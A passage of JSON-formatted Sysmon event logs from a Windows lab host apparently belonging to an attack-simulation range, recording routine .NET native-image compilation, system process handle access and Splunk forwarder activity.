08:05:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7543,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:44.226\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2232-5F25-0000-00105C970B00}\r\nTargetProcessId: 4160\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:44.226","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2232-5F25-0000-00105C970B00}","TargetProcessId":"4160","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7544,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:44.226\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2232-5F25-0000-00105C970B00}\r\nTargetProcessId: 4160\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:44.226","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2232-5F25-0000-00105C970B00}","TargetProcessId":"4160","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7545,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:44.226\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2232-5F25-0000-00105C970B00}\r\nTargetProcessId: 4160\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:44.226","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2232-5F25-0000-00105C970B00}","TargetProcessId":"4160","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7546,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:44.226\r\nSourceProcessGUID: {41C8662E-2258-5F25-0000-001064CF0D00}\r\nSourceProcessId: 2920\r\nSourceThreadId: 4916\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:44.226","SourceProcessGUID":"{41C8662E-2258-5F25-0000-001064CF0D00}","SourceProcessId":"2920","SourceThreadId":"4916","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7547,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:44.273\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-224F-5F25-0000-0010FC150D00}\r\nTargetProcessId: 2896\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:44.273","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-224F-5F25-0000-0010FC150D00}","TargetProcessId":"2896","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7548,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:44.273\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-224F-5F25-0000-0010FC150D00}\r\nTargetProcessId: 2896\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:44.273","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-224F-5F25-0000-0010FC150D00}","TargetProcessId":"2896","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7549,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:44.288\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2258-5F25-0000-001001D50D00}\r\nTargetProcessId: 2896\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:44.288","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2258-5F25-0000-001001D50D00}","TargetProcessId":"2896","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7550,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:05:44.491\r\nProcessGuid: {41C8662E-2258-5F25-0000-001001D50D00}\r\nProcessId: 2896\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b50-0\\PresentationFramework.Classic.dll\r\nCreationUtcTime: 2020-08-01 08:05:44.491","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:05:44.491","ProcessGuid":"{41C8662E-2258-5F25-0000-001001D50D00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b50-0\\PresentationFramework.Classic.dll","CreationUtcTime":"2020-08-01 08:05:44.491","EventReceivedTime":"2020-08-01 08:05:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7551,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:44.538\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-224F-5F25-0000-0010BF190D00}\r\nTargetProcessId: 1432\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 